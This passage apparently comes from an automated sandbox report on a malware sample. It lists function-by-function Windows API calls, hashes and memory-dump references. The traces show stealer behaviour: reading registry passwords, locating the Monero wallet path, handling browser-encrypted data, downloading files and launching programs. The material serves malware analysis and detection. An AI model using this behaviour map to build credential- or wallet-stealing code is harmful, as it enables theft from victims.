                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00406B50
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406B57
                                                    • InternetCloseHandle.WININET(?), ref: 00406B61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                    • String ID:
                                                    • API String ID: 2500263513-0
                                                    • Opcode ID: 19146b2a92cf3b66a6f48e2491a3ebf6e01c8e2ead9d210ebe94fa765b744fb1
                                                    • Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
                                                    • Opcode Fuzzy Hash: 19146b2a92cf3b66a6f48e2491a3ebf6e01c8e2ead9d210ebe94fa765b744fb1
                                                    • Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8
                                                    Function 02486C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02486CA6
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02486CD3
                                                    • StrCmpCA.SHLWAPI(?,00638C80), ref: 02486CF1
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 02486D11
                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02486D2F
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02486D48
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02486D6D
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02486D97
                                                    • CloseHandle.KERNEL32(00000000), ref: 02486DB7
                                                    • InternetCloseHandle.WININET(00000000), ref: 02486DBE
                                                    • InternetCloseHandle.WININET(?), ref: 02486DC8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                    • String ID:
                                                    • API String ID: 2500263513-0
                                                    • Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                    • Instruction ID: 3fd7ad26b59e2605277a50fbf4ddcb4d008c92c33b0d72ca09fffef0f24dde8d
                                                    • Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                    • Instruction Fuzzy Hash: EA419FB1A10215AFDB60EF65DC49FEE77BAEF44705F004459FA05E7280EF70AA408BA4
                                                    Function 024A4A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(0043573C,?,024979A8), ref: 024A4A6D
                                                    • GetProcAddress.KERNEL32(00000000,00435748), ref: 024A4A83
                                                    • GetProcAddress.KERNEL32(00000000,00435750), ref: 024A4A94
                                                    • GetProcAddress.KERNEL32(00000000,0043575C), ref: 024A4AA5
                                                    • GetProcAddress.KERNEL32(00000000,00435768), ref: 024A4AB6
                                                    • GetProcAddress.KERNEL32(00000000,00435770), ref: 024A4AC7
                                                    • GetProcAddress.KERNEL32(00000000,0043577C), ref: 024A4AD8
                                                    • GetProcAddress.KERNEL32(00000000,00435784), ref: 024A4AE9
                                                    • GetProcAddress.KERNEL32(00000000,0043578C), ref: 024A4AFA
                                                    • GetProcAddress.KERNEL32(00000000,0043579C), ref: 024A4B0B
                                                    • GetProcAddress.KERNEL32(00000000,004357A8), ref: 024A4B1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                    • Instruction ID: a5fe5a8fb7fc2cfe747b2122784778f2090948404f8b1c735f55ff6e419bd9f8
                                                    • Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                    • Instruction Fuzzy Hash: D5117875951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4
                                                    Function 004180E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00418105
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
                                                    • StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
                                                    • strtok_s.MSVCRT ref: 0041820F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID: ;B$fplugins
                                                    • API String ID: 3280532728-1193078497
                                                    • Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                    • Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
                                                    • Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                    • Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94
                                                    Function 004079A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                      • Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                      • Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
                                                      • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                      • Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
                                                      • Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                      • Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
                                                      • Part of subcall function 00407710: strlen.MSVCRT ref: 00407840
                                                    • lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 004079FD
                                                    • lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 00407A30
                                                    • wsprintfA.USER32 ref: 00407A50
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00407A79
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
                                                    • lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                    • String ID: :
                                                    • API String ID: 2460923012-3653984579
                                                    • Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                    • Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
                                                    • Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                    • Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5
                                                    Function 0248BF50 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248BF76
                                                    • lstrlen.KERNEL32(00000000), ref: 0248BFA9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248BFD3
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248BFDB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C003
                                                    • lstrlen.KERNEL32(0043509C), ref: 0248C07A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                    • Instruction ID: 89ad621ca994d70ee94c8a7bc22ed364f9ce59c214b18cb1d7d4fe494eaf33eb
                                                    • Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                    • Instruction Fuzzy Hash: 58A15E70A112459FCB25FF69C888AAE77F2AF45309F14846BE809D7361DB75D842CF60
                                                    Function 0249C7FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C8F2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C91B
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0249C97B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                    • String ID: (QC$.dll$<$XTC$\TC
                                                    • API String ID: 3031569214-1251744519
                                                    • Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                    • Instruction ID: 435cac6065180e3b9173e057f7ab79516f451fec62e66aad731265620a19839e
                                                    • Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                    • Instruction Fuzzy Hash: EE512C719112999FCF20FF79C88499DBBB2AF48309F55487ED909AB610EB349D86CF40
                                                    Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
                                                    • memset.MSVCRT ref: 00409ECF
                                                    • LocalAlloc.KERNEL32(00000040), ref: 00409F07
                                                      • Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E
                                                    • lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpymemcmp$AllocLocalmemset
                                                    • String ID: @$v10$v20
                                                    • API String ID: 3420379846-278772428
                                                    • Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                    • Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
                                                    • Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                    • Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8
                                                    Function 0249E3D0 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E3F6
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E404
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E41F
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E433
                                                    • lstrcat.KERNEL32(?,00638A84), ref: 0249E447
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E45B
                                                    • lstrcat.KERNEL32(?,00638AC8), ref: 0249E46E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E4A6
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0249E4AD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                                    • String ID:
                                                    • API String ID: 3428472996-0
                                                    • Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                    • Instruction ID: f712e01e8a83a121e58482bc22ea9b72c520fca4cd8d826cb5c1cc11bf78f05b
                                                    • Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                    • Instruction Fuzzy Hash: 4E4183B1911168ABCF15EF74CC44ADD7BB6AF48300F1489AAE94993250DBB49F85CF90
                                                    Function 0249C642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C736
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C75F
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0249C7CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                    • String ID: "" $(QC$(QC$<
                                                    • API String ID: 3031569214-2404812987
                                                    • Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                    • Instruction ID: 1797442869dc3fdf1030befe572da53f52d43be0f8804d0cc7d2eb34fb34d2a9
                                                    • Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                    • Instruction Fuzzy Hash: B2513C719112999BCB20FF79D8C499DBBB2AF48308F1548BFD805AB611EB349D46CF80
                                                    Function 024A2947 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 024A2982
                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,0249967D,00000000,00000000,00000000,00000000), ref: 024A29B3
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024A2A16
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2A1D
                                                    • wsprintfA.USER32 ref: 024A2A42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                                    • String ID: :\$C
                                                    • API String ID: 2572753744-3309953409
                                                    • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction ID: ebac442d2ab939e29c851120b3724318c7ba195a4c4b8bd69011db540edda4e8
                                                    • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction Fuzzy Hash: A53170B1D082499FCB14CFA88994AEEFFBDFB58740F00416EE505E7650E3748B408BA1
                                                    Function 00401000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                    Strings
                                                    • SOFTWARE\monero-project\monero-core, xrefs: 0040102F
                                                    • wallet_path, xrefs: 0040104D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                    • API String ID: 3466090806-4244082812
                                                    • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
                                                    • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0
                                                    Function 02489357 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02489376
                                                    • InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 02489393
                                                    • InternetCloseHandle.WININET(00000000), ref: 024893A0
                                                      • Part of subcall function 02498117: memchr.MSVCRT ref: 02498156
                                                      • Part of subcall function 02498117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 02498170
                                                      • Part of subcall function 02498117: memchr.MSVCRT ref: 0249818F
                                                      • Part of subcall function 02488C17: std::_Xinvalid_argument.LIBCPMT ref: 02488C2D
                                                    • strlen.MSVCRT ref: 024893BC
                                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 024893FD
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0248942E
                                                    • InternetCloseHandle.WININET(00000000), ref: 02489439
                                                    • InternetCloseHandle.WININET(00000000), ref: 02489440
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
